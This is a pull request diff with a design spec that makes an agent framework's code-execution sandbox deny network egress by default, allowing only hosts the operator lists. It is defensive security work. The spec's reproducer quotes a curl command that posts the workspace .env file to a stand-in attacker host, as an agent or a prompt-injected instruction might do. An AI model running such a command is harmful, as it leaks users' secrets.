### PR TITLE
feat(sandbox): default-deny egress for run_code — operator allow-list only (#2216)

### DIFF
--- a/config.example.yaml
+++ b/config.example.yaml
@@ -138,21 +138,26 @@ agents:
 # registered but every call returns a clear "sandbox not configured" error
 # so the LLM can react.
 #
-# `bash.allow_net` is the only tunable specific to the `bash` tool today:
-# - omitted block / empty list → bash by itself wants **no network**
-# - non-empty list → boxlite allow-list (host patterns or CIDRs)
+# Network is DEFAULT-DENY. `bash` and `run_code` each take their own
+# `allow_net` list, and both default to no network:
+# - omitted `bash:` / `run_code:` block, or empty `allow_net` → that tool
+#   wants **no network** (the safe ground state; untrusted, LLM-generated
+#   `run_code` gets zero egress)
+# - non-empty list → boxlite allow-list of host patterns / CIDRs /
+#   subdomain wildcards (e.g. "pypi.org", "*.crates.io", "10.0.0.0/8")
 #
-# Important: `bash` and `run_code` share a single per-session VM, which
-# carries a single network policy. The effective policy is the **union**
-# (most-permissive) across both tools, computed once at VM creation and
-# fixed for the session — see `crates/app/src/sandbox.rs`. Because
-# `run_code` is registered with full outbound access (its historical
-# behavior), the session VM's network is effectively "full outbound" as
-# long as `run_code` is registered, regardless of the value of
-# `bash.allow_net`. The `allow_net` knob is therefore primarily a hook
-# for future tools that may want to tighten the union; it cannot
-# unilaterally disable network for the bash tool while `run_code` is
-# also present.
+# `bash` and `run_code` share a single per-session VM, which carries a
+# single network policy: the **union** (most-permissive) of the two
+# `allow_net` lists, de-duplicated, computed once at VM creation and fixed
+# for the session — see `crates/app/src/sandbox.rs`. If both lists are
+# empty/absent, the VM has no network at all.
+#
+# There is no "allow all hosts" switch. boxlite v0.9.7 has no wildcard
+# token that means every host (a bare "*" matches no real host; "0.0.0.0/0"
+# leaves DNS sinkholed), and rara does not add a sentinel for it. To grant
+# broad reach, enumerate the domains you trust — subdomain wildcards
+# ("*.example.com") cover host families. This is the OpenAI Codex /
+# Claude-sandbox baseline: default-deny egress, explicit allow-list only.
 #
 # Pre-flight: `rara setup boxlite` must have staged the runtime files (see
 # docs/guides/boxlite-runtime.md).
@@ -163,6 +168,10 @@ agents:
 #     allow_net:
 #       - "github.com"
 #       - "*.crates.io"
+#   run_code:
+#     allow_net:
+#       - "pypi.org"
+#       - "files.pythonhosted.org"
 
 # ---------------------------------------------------------------------------
 # Telemetry — optional OTLP traces, Pyroscope profiling, and Layer B payload

--- a/crates/app/src/lib.rs
+++ b/crates/app/src/lib.rs
@@ -185,6 +185,13 @@ pub struct SandboxToolConfig {
     /// `Disabled` and an empty allow-list — the safe ground state.
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub bash:                 Option<BashSandboxConfig>,
+    /// Per-tool sandbox tuning for `run_code`. `None` (the YAML default
+    /// when the `run_code:` block is absent) means `run_code` contributes
+    /// network `Disabled` and an empty allow-list — the safe, default-deny
+    /// ground state. Untrusted, LLM-generated code therefore has **no**
+    /// outbound network unless the operator explicitly enumerates hosts.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub run_code:             Option<RunCodeSandboxConfig>,
 }
 
 /// Network and runtime policy for the sandboxed `bash` tool.
@@ -200,6 +207,32 @@ pub struct BashSandboxConfig {
     ///
     /// Note: when `run_code` is also configured, the per-session VM uses
     /// the **fused** policy across all callers — see
+    /// `crates/app/src/sandbox.rs` for the union rule.
+    #[serde(default)]
+    #[builder(default)]
+    pub allow_net: Vec<String>,
+}
+
+/// Network policy for the sandboxed `run_code` tool.
+///
+/// Structural twin of [`BashSandboxConfig`]: a separate per-tool struct so
+/// each tool may grow independent knobs later without coupling. Per
+/// `docs/guides/rust-style.md`, it does NOT derive `Default` — the absent
+/// state is `Option<RunCodeSandboxConfig>` on [`SandboxToolConfig::run_code`],
+/// not a Rust-side default value.
+#[derive(Debug, Clone, bon::Builder, Serialize, Deserialize)]
+pub struct RunCodeSandboxConfig {
+    /// Hosts the sandboxed `run_code` may reach over network. An empty list
+    /// means no network access (the default-deny ground state for
+    /// untrusted, LLM-generated code). A non-empty list is forwarded to
+    /// boxlite as [`rara_sandbox::NetworkPolicy::Enabled`]; entries are
+    /// ordinary boxlite host/CIDR/subdomain-wildcard patterns (e.g.
+    /// `"pypi.org"`, `"*.crates.io"`, `"10.0.0.0/8"`), passed through
+    /// verbatim. There is no "all hosts" token — boxlite v0.9.7 has none,
+    /// so full outbound is deliberately not expressible.
+    ///
+    /// Note: when `bash` is also configured, the per-session VM uses the
+    /// **fused** policy across all callers — see
     /// `crates/app/src/sandbox.rs` for the union rule.
     #[serde(default)]
     #[builder(default)]

--- a/crates/app/src/sandbox.rs
+++ b/crates/app/src/sandbox.rs
@@ -33,17 +33,23 @@
 //! The fusion rule is the union (most-permissive) across all sandbox-using
 //! tools that may run in the same session:
 //!
-//! - if **every** caller wants `Disabled`, the result is `Disabled`;
-//! - otherwise the result is `Enabled` with the union of allow-lists. An empty
-//!   allow-list under `Enabled` means full outbound (boxlite's own default), so
-//!   a single full-net caller correctly dominates.
+//! - if **every** caller wants `Disabled`, the result is `Disabled` (the
+//!   default-deny ground state — an absent or empty allow-list contributes
+//!   nothing);
+//! - otherwise the result is `Enabled` with the de-duplicated union of the
+//!   callers' allow-lists. That union is always a concrete, host/CIDR-scoped
+//!   list. No config input can produce `Enabled { allow_net: [] }` — the
+//!   empty-list value that boxlite treats as *full outbound* is deliberately
+//!   unreachable, because boxlite v0.9.7 has no "all hosts" token and we do not
+//!   reintroduce one as a rara sentinel (see #2216).
 //!
-//! Today the contributors are:
+//! Both contributors are config-driven and default-deny:
 //!
 //! - `bash` — config at [`SandboxToolConfig::bash`] (`None` ⇒ `Disabled`, empty
 //!   `allow_net` ⇒ `Disabled`, non-empty ⇒ `Enabled` with that list);
-//! - `run_code` — historical full network access, modelled as `Enabled {
-//!   allow_net: [] }`.
+//! - `run_code` — config at [`SandboxToolConfig::run_code`], same semantics.
+//!   Untrusted, LLM-generated code gets **no** egress unless the operator
+//!   explicitly enumerates hosts.
 
 use std::{future::Future, sync::Arc, time::Duration};
 
@@ -112,47 +118,42 @@ pub async fn sandbox_for_session(
 /// most-permissive policy across every sandbox-using tool that may run in
 /// the session.
 ///
-/// See the module-level "Network policy fusion" docs for the rule. Today
-/// the contributors are `bash` (config-driven) and `run_code` (historical
-/// full network).
+/// See the module-level "Network policy fusion" docs for the rule. Both
+/// contributors — `bash` and `run_code` — are config-driven and default-deny:
+/// an absent block or an empty `allow_net` contributes `Disabled`; a non-empty
+/// `allow_net` contributes `Enabled` with that concrete host/CIDR list. When
+/// every contributor is `Disabled` the result is `Disabled`; otherwise it is
+/// `Enabled` with the de-duplicated union of the non-empty lists. No input can
+/// yield `Enabled { allow_net: [] }` (boxlite's full-outbound sentinel) — that
+/// footgun is deliberately unreachable (see #2216).
 pub fn fused_network_policy(config: &SandboxToolConfig) -> NetworkPolicy {
-    // run_code's contribution: historical full outbound access, modelled as
-    // Enabled with an empty allow-list. This always pushes the union to
-    // Enabled — but we still compute the union explicitly so that adding a
-    // future, more restrictive caller (e.g. a CIDR-pinned tool) won't
-    // silently widen its access.
-    let run_code_enabled = true;
-    let run_code_allow: Vec<String> = Vec::new();
+    // Each contributor maps to its allow-list. An absent block or an empty
+    // `allow_net` is a default-deny contributor (empty vec); a non-empty
+    // `allow_net` is a scoped contributor. `run_code` is no longer a
+    // hardcoded full-net floor — its egress is operator config, same as bash.
+    let contributors = [
+        config.run_code.as_ref().map(|c| c.allow_net.as_slice()),
+        config.bash.as_ref().map(|c| c.allow_net.as_slice()),
+    ];
 
-    // bash's contribution.
-    let (bash_enabled, bash_allow): (bool, Vec<String>) = match config.bash.as_ref() {
-        // No `bash:` block → Disabled, empty allow-list.
-        None => (false, Vec::new()),
-        Some(b) if b.allow_net.is_empty() => (false, Vec::new()),
-        Some(b) => (true, b.allow_net.clone()),
-    };
-
-    if !run_code_enabled && !bash_enabled {
-        return NetworkPolicy::Disabled;
+    // Union the non-empty allow-lists, preserving first-seen order and
+    // dropping duplicates. A contributor that is absent or empty adds
+    // nothing, so it can only ever tighten — never widen — the union.
+    let mut allow_net: Vec<String> = Vec::new();
+    for host in contributors.into_iter().flatten().flatten() {
+        if !allow_net.contains(host) {
+            allow_net.push(host.clone());
+        }
     }
 
-    // Union the allow-lists. If any contributor wants full outbound
-    // (Enabled with an empty list), the union must also be full outbound,
-    // so we collapse the result to an empty allow-list in that case.
-    let any_unrestricted =
-        (run_code_enabled && run_code_allow.is_empty()) || (bash_enabled && bash_allow.is_empty());
-    let allow_net = if any_unrestricted {
-        Vec::new()
+    // All contributors default-deny → no network at all. Otherwise the union
+    // is a concrete, host/CIDR-scoped list; it is never empty here, so the
+    // `Enabled { allow_net: [] }` full-outbound sentinel is unreachable.
+    if allow_net.is_empty() {
+        NetworkPolicy::Disabled
     } else {
-        let mut merged: Vec<String> = run_code_allow;
-        for host in bash_allow {
-            if !merged.contains(&host) {
-                merged.push(host);
-            }
-        }
-        merged
-    };
-    NetworkPolicy::Enabled { allow_net }
+        NetworkPolicy::Enabled { allow_net }
+    }
 }
 
 /// Standard "sandbox not configured" error returned by tools that require
@@ -247,7 +248,7 @@ mod tests {
     use std::sync::Mutex as StdMutex;
 
     use super::*;
-    use crate::BashSandboxConfig;
+    use crate::{BashSandboxConfig, RunCodeSandboxConfig};
 
     /// Payload for the reclamation tests — stands in for `Sandbox` so the
     /// mechanism is exercised without a boxlite dependency.
@@ -358,44 +359,107 @@ mod tests {
         drop(clone);
     }
 
-    fn cfg(bash: Option<BashSandboxConfig>) -> SandboxToolConfig {
+    fn cfg(
+        run_code: Option<RunCodeSandboxConfig>,
+        bash: Option<BashSandboxConfig>,
+    ) -> SandboxToolConfig {
         SandboxToolConfig::builder()
             .default_rootfs_image("alpine:latest".to_owned())
+            .maybe_run_code(run_code)
             .maybe_bash(bash)
             .build()
     }
 
-    /// Even when bash is `None` (Disabled), `run_code` keeps full outbound
-    /// access — so the fused policy is `Enabled { allow_net: [] }`.
+    fn run_code(allow_net: &[&str]) -> RunCodeSandboxConfig {
+        RunCodeSandboxConfig::builder()
+            .allow_net(allow_net.iter().map(|s| (*s).to_owned()).collect())
+            .build()
+    }
+
+    fn bash(allow_net: &[&str]) -> BashSandboxConfig {
+        BashSandboxConfig::builder()
+            .allow_net(allow_net.iter().map(|s| (*s).to_owned()).collect())
+            .build()
+    }
+
+    /// Default-deny: no `bash`, no `run_code` → the fused policy is
+    /// `Disabled`. This inverts the pre-#2216 behavior, where the same input
+    /// returned `Enabled { allow_net: [] }` (full outbound) because
+    /// `run_code` was a hardcoded full-net floor.
     #[test]
-    fn fuses_run_code_full_net_with_disabled_bash() {
-        match fused_network_policy(&cfg(None)) {
-            NetworkPolicy::Enabled { allow_net } => assert!(allow_net.is_empty()),
-            NetworkPolicy::Disabled => panic!("run_code should keep network up"),
+    fn no_config_yields_disabled_network() {
+        assert!(matches!(
+            fused_network_policy(&cfg(None, None)),
+            NetworkPolicy::Disabled
+        ));
+    }
+
+    /// An empty `run_code.allow_net` is a default-deny contributor, not full
+    /// outbound — with bash also absent, the fused policy is `Disabled`.
+    #[test]
+    fn empty_run_code_allowlist_is_disabled() {
+        assert!(matches!(
+            fused_network_policy(&cfg(Some(run_code(&[])), None)),
+            NetworkPolicy::Disabled
+        ));
+    }
+
+    /// The operator's explicit `run_code` allow-list is honored verbatim.
+    #[test]
+    fn run_code_allowlist_is_honored() {
+        let policy = fused_network_policy(&cfg(
+            Some(run_code(&["pypi.org", "files.pythonhosted.org"])),
+            None,
+        ));
+        match policy {
+            NetworkPolicy::Enabled { allow_net } => {
+                assert_eq!(allow_net.len(), 2, "no duplicates expected");
+                assert!(allow_net.contains(&"pypi.org".to_owned()));
+                assert!(allow_net.contains(&"files.pythonhosted.org".to_owned()));
+            }
+            NetworkPolicy::Disabled => panic!("expected Enabled with the operator allow-list"),
         }
     }
 
-    /// A bash allow-list does NOT shrink `run_code`'s full outbound access:
-    /// the union with an unrestricted caller is unrestricted.
+    /// `bash` and `run_code` allow-lists union into one policy: both hosts
+    /// present, neither dropped.
     #[test]
-    fn fuses_run_code_full_net_dominates_bash_allowlist() {
-        let bash = BashSandboxConfig::builder()
-            .allow_net(vec!["github.com".to_owned()])
-            .build();
-        match fused_network_policy(&cfg(Some(bash))) {
-            NetworkPolicy::Enabled { allow_net } => assert!(allow_net.is_empty()),
-            NetworkPolicy::Disabled => panic!("expected Enabled"),
+    fn bash_and_run_code_allowlists_union() {
+        let policy = fused_network_policy(&cfg(
+            Some(run_code(&["pypi.org"])),
+            Some(bash(&["github.com"])),
+        ));
+        match policy {
+            NetworkPolicy::Enabled { allow_net } => {
+                assert_eq!(allow_net.len(), 2, "deduplicated union of both lists");
+                assert!(allow_net.contains(&"pypi.org".to_owned()));
+                assert!(allow_net.contains(&"github.com".to_owned()));
+            }
+            NetworkPolicy::Disabled => panic!("expected Enabled union"),
         }
     }
 
-    /// Empty `allow_net` on bash collapses to Disabled for that caller, but
-    /// `run_code` still pushes the union to Enabled (full outbound).
+    /// No config input can reach the `Enabled { allow_net: [] }` full-outbound
+    /// sentinel. A bare `"*"` and a `"0.0.0.0/0"` entry are passed through as
+    /// ordinary boxlite patterns — each yields a *scoped* `Enabled` carrying
+    /// exactly the operator's entries, never an empty list.
     #[test]
-    fn fuses_empty_bash_allowlist_as_disabled_caller() {
-        let bash = BashSandboxConfig::builder().allow_net(vec![]).build();
-        match fused_network_policy(&cfg(Some(bash))) {
-            NetworkPolicy::Enabled { allow_net } => assert!(allow_net.is_empty()),
-            NetworkPolicy::Disabled => panic!("run_code should keep network up"),
+    fn no_config_input_yields_empty_allowlist_enabled() {
+        for entry in ["*", "0.0.0.0/0"] {
+            match fused_network_policy(&cfg(Some(run_code(&[entry])), None)) {
+                NetworkPolicy::Enabled { allow_net } => {
+                    assert_eq!(
+                        allow_net,
+                        vec![entry.to_owned()],
+                        "entry must pass through verbatim, never expand to all-hosts"
+                    );
+                    assert!(
+                        !allow_net.is_empty(),
+                        "the empty-list full-outbound sentinel must be unreachable"
+                    );
+                }
+                NetworkPolicy::Disabled => panic!("a non-empty allow-list must stay Enabled"),
+            }
         }
     }
 }

--- a/crates/app/src/tools/AGENT.md
+++ b/crates/app/src/tools/AGENT.md
@@ -42,13 +42,16 @@ isolation.
   `<workspace>/x` → guest `/workspace/x`. Out-of-workspace paths hit a
   hard error rather than silently being routed through approval; the
   guest has no mount for them. See `bash.rs::translate_cwd`.
-- **Network policy is fused, not per-call.** Sandbox-using tools share a
-  single per-session VM, which carries a single network policy. The
-  effective policy is the union (most-permissive) across all
-  sandbox-using tools — see
+- **Network policy is fused, not per-call, and default-deny.**
+  Sandbox-using tools share a single per-session VM carrying a single
+  network policy — the union (most-permissive) across all sandbox-using
+  tools. Both `bash` and `run_code` are config-driven and default-deny:
+  an absent block or empty `allow_net` contributes no network, so untrusted
+  `run_code` gets zero egress unless the operator enumerates hosts. No
+  config input yields full outbound (`Enabled { allow_net: [] }`) — see
   `crates/app/src/sandbox.rs::fused_network_policy` and
-  `crates/rara-sandbox/AGENT.md` (Network policy fusion). Do not pass a
-  per-call `NetworkPolicy` to `sandbox_for_session`.
+  `crates/rara-sandbox/AGENT.md` (Network policy fusion) (#2216). Do not
+  pass a per-call `NetworkPolicy` to `sandbox_for_session`.
 - **`Sandbox` is single-owner; concurrent tool calls in the same session
   serialise on `Arc<tokio::Mutex<Sandbox>>`.** Tools must hold the lock
   for the whole exec; do not split into "lock — drop — re-lock to read

--- a/crates/app/src/tools/run_code.rs
+++ b/crates/app/src/tools/run_code.rs
@@ -119,9 +119,10 @@ impl RunCodeTool {
         // The shared per-session VM picks its NetworkPolicy from the fused
         // policy across all sandbox-using tools — see
         // `crates/app/src/sandbox.rs::fused_network_policy`. `run_code`
-        // contributes "Enabled with empty allow-list" (full outbound), so
-        // its historical behavior is preserved when bash is absent or
-        // permissive (#1937, #1946).
+        // contributes its own config-driven, default-deny allow-list
+        // (`SandboxToolConfig::run_code`): no egress unless the operator
+        // enumerates hosts. Full outbound is not expressible from YAML
+        // (#1937, #1946, #2216).
         sandbox_for_session(cfg, &self.sandboxes, session_key).await
     }
 }

--- a/crates/rara-sandbox/AGENT.md
+++ b/crates/rara-sandbox/AGENT.md
@@ -40,11 +40,13 @@ Public surface (intentionally minimal, see #1697/#1698):
 - **No hardcoded rootfs image / paths.** The image reference is a required
   `SandboxConfig` field; the application layer reads it from YAML and
   passes it through. Do not add an `impl Default for SandboxConfig`.
-  `NetworkPolicy` *does* implement `Default` — the value mirrors
-  `boxlite::NetworkSpec::default` (`Enabled { allow_net: [] }`) so a YAML
-  config that omits `network` keeps the historical `run_code` behavior.
-  This is the only `Default` impl in the crate and exists solely to make
-  `#[serde(default)]` on `SandboxConfig::network` legal.
+  `NetworkPolicy` *does* implement `Default` — the value is
+  `Disabled` (safe-by-default). This **deliberately diverges** from
+  `boxlite::NetworkSpec::default` (`Enabled { allow_net: [] }` = full
+  outbound): a config that omits `network` must not silently grant
+  untrusted code egress (#2216). This is the only `Default` impl in the
+  crate and exists solely to make `#[serde(default)]` on
+  `SandboxConfig::network` legal.
 - **No noop impls, no mock backend.** `docs/guides/anti-patterns.md`
   forbids silent `Ok(())` trait impls. If you need to test a caller
   without a real VM, fake it at the caller boundary — not inside this
@@ -100,10 +102,15 @@ restrictive setting from the first caller forward.
 
 The fusion rule lives at `crates/app/src/sandbox.rs::fused_network_policy`:
 
-- if **every** sandbox-using tool wants `Disabled`, the result is `Disabled`;
-- otherwise the result is `Enabled` with the union of allow-lists. An empty
-  allow-list under `Enabled` means full outbound (boxlite's own default), so
-  a single full-net contributor (today `run_code`) dominates the union.
+- if **every** sandbox-using tool wants `Disabled` (absent block or empty
+  `allow_net`), the result is `Disabled` — the default-deny ground state;
+- otherwise the result is `Enabled` with the de-duplicated union of the
+  callers' non-empty allow-lists. That union is always a concrete,
+  host/CIDR-scoped list. No config input can produce `Enabled { allow_net:
+  [] }` (boxlite's empty-list = full-outbound sentinel): boxlite v0.9.7 has
+  no "all hosts" token, and rara does not reintroduce one, so full outbound
+  is deliberately not expressible from YAML (#2216). Both `bash` and
+  `run_code` are config-driven and default-deny.
 
 When you add a new sandbox-using tool, extend `fused_network_policy` so the
 union accounts for the tool's policy. Do **not** add a per-call

--- a/crates/rara-sandbox/src/config.rs
+++ b/crates/rara-sandbox/src/config.rs
@@ -49,9 +49,13 @@ pub struct SandboxConfig {
 
     /// Network policy forwarded to [`boxlite::BoxOptions::network`].
     ///
-    /// Defaults to [`NetworkPolicy::Enabled`] with an empty allow-list, which
-    /// matches boxlite's own default and preserves the historical `run_code`
-    /// behavior of full outbound access.
+    /// Defaults to [`NetworkPolicy::Disabled`] — safe-by-default. This
+    /// deliberately diverges from boxlite's own default (`Enabled` with an
+    /// empty allow-list = full outbound): a `SandboxConfig` that omits
+    /// `network` gets **no** egress, so a future builder that forgets to set
+    /// it cannot silently grant untrusted code full network access (#2216).
+    /// The rara app path always sets this explicitly via
+    /// `crates/app/src/sandbox.rs::fused_network_policy`.
     #[serde(default)]
     #[builder(default)]
     pub network: NetworkPolicy,
@@ -147,15 +151,13 @@ pub enum NetworkPolicy {
 }
 
 impl Default for NetworkPolicy {
-    /// Mirror boxlite's own [`NetworkSpec::default`](boxlite::NetworkSpec) —
-    /// network up, empty allow-list = full outbound. Required so
-    /// `#[serde(default)]` on [`SandboxConfig::network`] works when YAML
-    /// omits the field; preserves `run_code`'s historical behavior.
-    fn default() -> Self {
-        Self::Enabled {
-            allow_net: Vec::new(),
-        }
-    }
+    /// Safe-by-default: no network. This **diverges** from boxlite's own
+    /// [`NetworkSpec::default`](boxlite::NetworkSpec) (`Enabled` with an empty
+    /// allow-list = full outbound) on purpose — a config that omits `network`
+    /// must not silently grant untrusted code egress (#2216). Required so
+    /// `#[serde(default)]` on [`SandboxConfig::network`] works when YAML omits
+    /// the field.
+    fn default() -> Self { Self::Disabled }
 }
 
 #[cfg(test)]
@@ -163,17 +165,21 @@ mod tests {
     use super::*;
 
     #[test]
-    fn sandbox_config_defaults_match_boxlite() {
+    fn network_policy_default_is_disabled() {
+        // A SandboxConfig that omits `network` is safe-by-default: no egress.
         let cfg = SandboxConfig::builder()
             .rootfs_image("alpine:latest".to_owned())
             .build();
 
         assert!(cfg.volumes.is_empty());
         assert!(cfg.working_dir.is_none());
-        match cfg.network {
-            NetworkPolicy::Enabled { allow_net } => assert!(allow_net.is_empty()),
-            NetworkPolicy::Disabled => panic!("default network must be Enabled"),
-        }
+        assert!(
+            matches!(cfg.network, NetworkPolicy::Disabled),
+            "default network must be Disabled (safe-by-default), not full outbound"
+        );
+
+        // And the Default impl itself diverges from boxlite for safety.
+        assert!(matches!(NetworkPolicy::default(), NetworkPolicy::Disabled));
     }
 
     #[test]

--- a/specs/issue-2216-run-code-default-deny-egress.spec.md
+++ b/specs/issue-2216-run-code-default-deny-egress.spec.md
@@ -1,0 +1,325 @@
+spec: task
+name: "issue-2216-run-code-default-deny-egress"
+inherits: project
+tags: []
+---
+
+## Intent
+
+The `run_code` tool executes untrusted, LLM-generated code inside a
+per-session boxlite microVM. That VM currently has **full outbound
+network by default**, and no operator config can turn it off while
+`run_code` is registered.
+
+The reason is `crates/app/src/sandbox.rs::fused_network_policy`. The
+per-session VM is shared by `bash` + `run_code` and carries a single
+`NetworkPolicy`, computed once at VM creation as the most-permissive
+union across all sandbox-using tools. `run_code`'s contribution is
+**hardcoded** to `Enabled { allow_net: [] }` (empty list under `Enabled`
+= full outbound in boxlite), so it always dominates the union. `bash`
+has a real config-driven allow-list (`SandboxToolConfig::bash.allow_net`,
+default-deny), but it cannot shrink the union below `run_code`'s
+hardcoded full-net floor. `config.example.yaml` (the sandbox block)
+admits this in prose: the `bash.allow_net` knob "cannot unilaterally
+disable network while `run_code` is also present."
+
+Reproducer for the failure mode:
+
+1. Operator enables sandboxing with only
+   `sandbox: { default_rootfs_image: "alpine:latest" }` — no `bash`
+   block, no allow-list anywhere. This is the minimal, reasonable
+   "I want code execution" config.
+2. The agent (or a prompt-injected instruction) calls `run_code` with,
+   e.g., `sh -c "curl -X POST https://attacker.example/x --data-binary
+   @/workspace/.env"`.
+3. Observed bad outcome: the request succeeds. `fused_network_policy`
+   returned `Enabled { allow_net: [] }` (full outbound) because
+   `run_code_enabled = true; run_code_allow = []` is hardcoded, so the
+   VM has unrestricted egress. Untrusted code exfiltrates workspace
+   contents. The operator has **no** config surface to prevent it short
+   of removing the `sandbox:` block entirely (which also kills the
+   feature).
+
+The industry baseline for running untrusted code (OpenAI Codex CLI,
+Claude's own code sandbox) is default-deny egress with an explicit
+allow-list. This issue brings `run_code` in line: the per-session VM has
+**no** outbound network unless the operator explicitly lists hosts/CIDRs
+in `config.yaml`. Empty / absent config = no network.
+
+The change is confined to the **policy-computation** layer, which is
+where the security decision is actually made and where it is
+CI-testable. Actual packet-level enforcement is boxlite's job and runs
+only inside a real microVM (`crates/rara-sandbox/tests/alpine_echo.rs`
+is `#[ignore]`d — needs staged runtime files + a warm OCI cache, not
+available in CI). So the falsifiable coverage lives at
+`fused_network_policy` and `NetworkPolicy::default`, the two functions
+that decide "network up or down, and to where."
+
+Goal alignment: this advances signal 1 ("the process runs for months
+without intervention") — an agent whose untrusted-code sandbox can
+exfiltrate or be weaponised via unrestricted egress is not one that
+"runs for years" safely; it is squarely under the stated 2026-Q2
+"Safety and stability hardening" focus. It also *reinforces* the
+"NOT a black box" line: egress becomes an explicit, auditable YAML
+allow-list instead of an invisible always-on default. It crosses no
+NOT line — not multi-user, not a framework (no new abstraction, the
+existing fusion rule stays), not a code agent. Hermes parity: N/A —
+Hermes is a hosted assistant; local execution of untrusted code on the
+user's own machine is a rara-specific surface with no Hermes analogue,
+so there is no "Hermes already does this" default-to-not-start.
+
+Prior-art review (raw):
+
+- `gh pr list --search "network policy sandbox"` → PR 1946
+  (`feat(sandbox): replace path-scope guard with sandbox-enforced FS
+  boundary`, MERGED) and PR 1939 (superseded/closed sub-PR). PR 1946 is
+  the direct ancestor: it introduced `fused_network_policy`, the
+  shared-VM model, and — critically — its "Design decisions" section
+  explicitly chose to model `run_code` as `Enabled { allow_net: [] }`
+  to **preserve run_code's historical full-outbound behavior**. This
+  issue **deliberately supersedes that specific decision.** It is NOT a
+  forgotten reversal of a removal (the prior-art guard's target case):
+  PR 1946 removed nothing here; it consciously kept the legacy full-net
+  default and flagged it as "historical." We are now changing that
+  historical default to default-deny, which is a new, intentional
+  security decision, not a re-introduction of deleted code.
+- PR 1946 review also established a hard invariant we MUST preserve:
+  **network policy is fixed once at VM creation; there is no per-call
+  `NetworkPolicy` argument to `sandbox_for_session`** (a per-call arg
+  would be silently dropped on cache hits — first-caller-wins leak).
+  This spec keeps that invariant: `run_code`'s contribution moves from
+  hardcoded to config-driven, but the fusion stays a create-time
+  computation from shared config.
+- `git log --all --grep "allow_net|network policy|fused"` → only
+  b5914310 (PR 1946) and 8ed93b75 (PR 1937). No other history touches
+  this policy. No open issue duplicates this (`gh issue list` returned
+  only issue 1700, the original code-execution tool, unrelated to
+  egress policy).
+- `rg "allow_net|NetworkPolicy|fused_network"` → the surface is exactly:
+  `crates/app/src/sandbox.rs`, `crates/app/src/lib.rs`,
+  `crates/rara-sandbox/src/config.rs`, `config.example.yaml`, plus doc
+  in `crates/app/src/tools/{AGENT.md,bash.rs,run_code.rs}` and
+  `crates/rara-sandbox/AGENT.md`.
+
+## Decisions
+
+- **`run_code` gets its own config-driven allow-list, mirroring `bash`.**
+  Add `run_code: Option<RunCodeSandboxConfig>` to `SandboxToolConfig`
+  (`crates/app/src/lib.rs`), where
+  `RunCodeSandboxConfig { allow_net: Vec<String> }` is the structural
+  twin of the existing `BashSandboxConfig`. Semantics identical to bash:
+  `None` (block absent) ⇒ no network; empty `allow_net` ⇒ no network;
+  non-empty ⇒ `Enabled` with that host/CIDR list. No Rust-side default
+  value — absence is `Option::None` (per `docs/guides/rust-style.md`;
+  same rule that keeps `BashSandboxConfig` off `#[derive(Default)]`).
+- **A parallel struct, not a shared one.** `RunCodeSandboxConfig` and
+  `BashSandboxConfig` are byte-identical today (`{ allow_net }`), so a
+  single shared `EgressConfig` was considered. Rejected: it forces a
+  rename of the already-referenced `BashSandboxConfig` (churn across
+  tests + docs) and pre-couples two tools that may grow independent
+  per-tool knobs later. Mirroring the established per-tool-struct pattern
+  is the lower-surprise choice; `fused_network_policy` already treats
+  each tool as an independent contributor.
+- **`fused_network_policy` reads `run_code` from config.** Replace the
+  hardcoded `let run_code_enabled = true; let run_code_allow = vec![];`
+  with the same `match config.run_code.as_ref()` shape already used for
+  `bash`. The union rule is otherwise unchanged: if every contributor
+  wants `Disabled` ⇒ `Disabled` (the new default-deny ground state);
+  otherwise `Enabled` with the de-duplicated union of allow-lists; a
+  contributor with a non-empty list no longer implies full-net (empty
+  list = deny for that contributor, not full-outbound). The "any
+  contributor with an empty allow-list under Enabled ⇒ collapse union to
+  full outbound" branch is **removed entirely**: no contributor is
+  unconditionally `Enabled` anymore, and — per the next decision — there
+  is no config input that yields `Enabled { allow_net: [] }`. Every
+  `Enabled` result carries a non-empty, host/CIDR-scoped allow-list.
+- **No full-outbound opt-in — deliberately removed after confirming
+  boxlite has no "all hosts" token.** The original plan kept an explicit
+  wildcard escape hatch for operators wanting unrestricted egress. The
+  implementation spike confirmed boxlite v0.9.7 has **no** wildcard that
+  means "all hosts": per its gvproxy-bridge source, `*.example.com` is a
+  subdomain-suffix match only; a bare `*` matches no real host (≡ no
+  network); `0.0.0.0/0` is not clean either (the DNS filter skips CIDRs,
+  so hostnames are still sinkholed); the *only* way to express full
+  outbound is the empty-list sentinel `Enabled { allow_net: [] }` —
+  exactly the footgun this issue exists to delete. Rather than
+  reintroduce a rara-only sentinel to bless that back, we take the
+  strongest default-deny posture: **the YAML surface can express only
+  deny (`None` / empty) or a concrete, enumerated allow-list of
+  hosts/CIDRs/subdomain-wildcards** (e.g. `["pypi.org", "*.crates.io"]`).
+  An operator who needs broad reach enumerates the domains (subdomain
+  wildcards cover families). No config path — including a literal
+  `["*"]` or `["0.0.0.0/0"]` entry, which are just passed through as
+  ordinary boxlite patterns — can ever collapse to
+  `Enabled { allow_net: [] }`. This is an intentional tightening of the
+  original decision, made once boxlite was confirmed to have no native
+  full-outbound token, and it matches the Codex/Claude baseline cited in
+  Intent.
+- **Flip `NetworkPolicy::default()` to `Disabled`.**
+  (`crates/rara-sandbox/src/config.rs`.) Its current default,
+  `Enabled { allow_net: [] }` (full outbound), exists solely to make
+  `#[serde(default)]` on `SandboxConfig::network` legal, and its doc +
+  the `rara-sandbox/AGENT.md` invariant justify it *only* as "preserves
+  run_code's historical behavior." That justification is exactly what
+  this issue removes, so the safe-by-default value is now `Disabled`.
+  The app path never depends on this default (it always calls
+  `.network(fused_network_policy(config))` explicitly), so this is a
+  defense-in-depth change with no behavioral effect on the app path — it
+  removes a type-level footgun where any future `SandboxConfig::builder()`
+  that forgets `.network()` would silently get full outbound. Update the
+  doc comment, the `AGENT.md` invariant wording (it currently says the
+  default "mirrors boxlite::NetworkSpec::default" — after the flip it
+  deliberately diverges for safety), and the
+  `sandbox_config_defaults_match_boxlite` unit test (rename/retarget to
+  assert `Disabled`).
+- **Do NOT reintroduce a per-call `NetworkPolicy` argument.** The fusion
+  remains a create-time computation from shared `SandboxToolConfig` (PR
+  1946 review invariant). This issue only changes *what* `run_code`
+  contributes to that computation, never *when* the policy is decided.
+- **Config docs must be rewritten, not appended.** The `sandbox:` block
+  narrative in `config.example.yaml` currently tells operators that
+  network is effectively always full-outbound while `run_code` is
+  registered and that `bash.allow_net` "cannot unilaterally disable
+  network." Both statements become false and MUST be replaced with the
+  default-deny model + the new `run_code.allow_net` key. Same for the
